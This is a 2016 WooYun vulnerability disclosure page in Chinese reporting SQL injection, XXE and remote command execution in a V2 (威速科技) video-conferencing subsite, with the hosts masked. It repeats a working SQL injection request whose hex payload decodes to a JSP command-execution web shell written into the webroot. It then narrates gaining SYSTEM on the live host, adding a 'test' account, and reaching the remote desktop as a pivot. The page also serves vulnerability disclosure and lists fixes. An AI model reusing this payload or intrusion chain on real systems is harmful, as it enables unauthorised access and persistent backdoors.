威速科技分站视频会议系统存在SQL注入/外部实体注入/getshell成功进入主机桌面

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0193160

漏洞标题：威速科技分站视频会议系统存在SQL注入/外部实体注入/getshell成功进入主机桌面

漏洞作者：路人甲

提交时间：2016-04-06 21:20

修复时间：2016-05-23 18:20

公开时间：2016-05-23 18:20

漏洞类型：命令执行

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-04-06：细节已通知厂商并且等待厂商处理中
2016-04-08：厂商已经确认，细节仅向厂商公开
2016-04-18：细节向核心白帽子及相关领域专家公开
2016-04-28：细节向普通白帽子公开
2016-05-08：细节向实习白帽子公开
2016-05-23：细节向公众公开

简要描述：

此漏洞之前有爆出过，作为厂商但是不知道为何只是头痛医头，脚痛医脚，把一个分站的问题修补了其他分站的问题就不管了？自己的分站系统安全性都没有做到位，客户会放心使用你们的产品吗？

详细说明：

http://**.**.**.**
公司简介
北京威速科技有限公司（简称威速V2）成立于2001年，自成立以来，公司一直致力于为全球客户提供世界领先的视频会议软件产品及各领域视频会议解决方案。公司客户遍布政府、制造业、能源行业、零售业、医疗行业、交通物流、电信、金融、教育及海外等众多领域，汇聚包括沃尔玛、可口可乐、中石油等全球500强企业在内的6000多家国内外知名企业和机构。
问题地址：http://**.**.**.**/Conf/jsp/main/mainAction.do

1、sql注入点：
http://**.**.**.**/Conf/jsp/systembulletin/bulletinAction.do?operator=details&sysId=-1%20union%20select%201,user(),3,database(),5%23

2、外部实体注入点
http://**.**.**.**/Conf/services/ConferenceWebService?wsdl

通过构造payload数据包请求上传shell

POST /Conf/jsp/systembulletin/bulletinAction.do?operator=details HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8 
Content-Length: 995
Content-Type: application/x-www-form-urlencoded
sysId=-1%20union%20select%200x3C2540207061676520636F6E74656E74547970653D22746578742F68746D6C3B20636861727365743D47424B2220253E0D0A3C2540207061676520696D706F72743D226A6176612E696F2E2A2220253E203C2520537472696E6720636D64203D20726571756573742E676574506172616D657465722822636D6422293B20537472696E67206F7574707574203D2022223B20696628636D6420213D206E756C6C29207B20537472696E672073203D206E756C6C3B20747279207B2050726F636573732070203D2052756E74696D652E67657452756E74696D6528292E6578656328636D64293B204275666665726564526561646572207349203D206E6577204275666665726564526561646572286E657720496E70757453747265616D52656164657228702E676574496E70757453747265616D282929293B207768696C65282873203D2073492E726561644C696E6528292920213D206E756C6C29207B206F7574707574202B3D2073202B225C725C6E223B207D207D20636174636828494F457863657074696F6E206529207B20652E7072696E74537461636B547261636528293B207D207D200D0A6F75742E7072696E746C6E286F7574707574293B253E,'','','','' into dumpfile '../../management/webapps/root/cmd.jsp'%23

将小马进行编码然后通过mysql执行文件导出，获得shell。
成功getshell，system权限创建了test用户

主机未开启3389端口，tasklist /svc通过查找termserver服务，然后根据服务找到端口映射之后的远程桌面端口39667进行桌面连接

连接成功，不在继续了，可作跳板主机进行内网测试。

参考资料：http://**.**.**.**/bugs/wooyun-2010-0143276
shell：http://**.**.**.**/cmd.jsp?cmd=whoami
系统用户：test test

漏洞证明：

1、sql注入点：
http://**.**.**.**/Conf/jsp/systembulletin/bulletinAction.do?operator=details&sysId=-1%20union%20select%201,user(),3,database(),5%23

2、外部实体注入点
http://**.**.**.**/Conf/services/ConferenceWebService?wsdl

通过构造payload数据包请求上传shell

POST /Conf/jsp/systembulletin/bulletinAction.do?operator=details HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8 
Content-Length: 995
Content-Type: application/x-www-form-urlencoded
sysId=-1%20union%20select%200x3C2540207061676520636F6E74656E74547970653D22746578742F68746D6C3B20636861727365743D47424B2220253E0D0A3C2540207061676520696D706F72743D226A6176612E696F2E2A2220253E203C2520537472696E6720636D64203D20726571756573742E676574506172616D657465722822636D6422293B20537472696E67206F7574707574203D2022223B20696628636D6420213D206E756C6C29207B20537472696E672073203D206E756C6C3B20747279207B2050726F636573732070203D2052756E74696D652E67657452756E74696D6528292E6578656328636D64293B204275666665726564526561646572207349203D206E6577204275666665726564526561646572286E657720496E70757453747265616D52656164657228702E676574496E70757453747265616D282929293B207768696C65282873203D2073492E726561644C696E6528292920213D206E756C6C29207B206F7574707574202B3D2073202B225C725C6E223B207D207D20636174636828494F457863657074696F6E206529207B20652E7072696E74537461636B547261636528293B207D207D200D0A6F75742E7072696E746C6E286F7574707574293B253E,'','','','' into dumpfile '../../management/webapps/root/cmd.jsp'%23

将小马进行编码然后通过mysql执行文件导出，获得shell。
成功getshell，system权限创建了test用户

主机未开启3389端口，tasklist /svc通过查找termserver服务，然后根据服务找到端口映射之后的远程桌面端口39667进行桌面连接

连接成功，不在继续了，可作跳板主机进行内网测试。

参考资料：http://**.**.**.**/bugs/wooyun-2010-0143276
shell：http://**.**.**.**/cmd.jsp?cmd=whoami
系统用户：test test

修复方案：

删除shell、test用户，对参数进行过滤，修复xee

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：11

确认时间：2016-04-08 18:14

厂商回复：

CNVD确认所述情况，已由CNVD通过网站管理方公开联系渠道向其邮件通报，由其后续提供解决方案。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0193160

漏洞标题：威速科技分站视频会议系统存在SQL注入/外部实体注入/getshell成功进入主机桌面

相关厂商：威速科技

漏洞作者：路人甲

提交时间：2016-04-06 21:20

修复时间：2016-05-23 18:20

公开时间：2016-05-23 18:20

漏洞类型：命令执行

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0193160

漏洞标题：威速科技分站视频会议系统存在SQL注入/外部实体注入/getshell成功进入主机桌面

相关厂商：威速科技

漏洞作者： 路人甲

提交时间：2016-04-06 21:20

修复时间：2016-05-23 18:20

公开时间：2016-05-23 18:20

漏洞类型：命令执行

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0193160"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云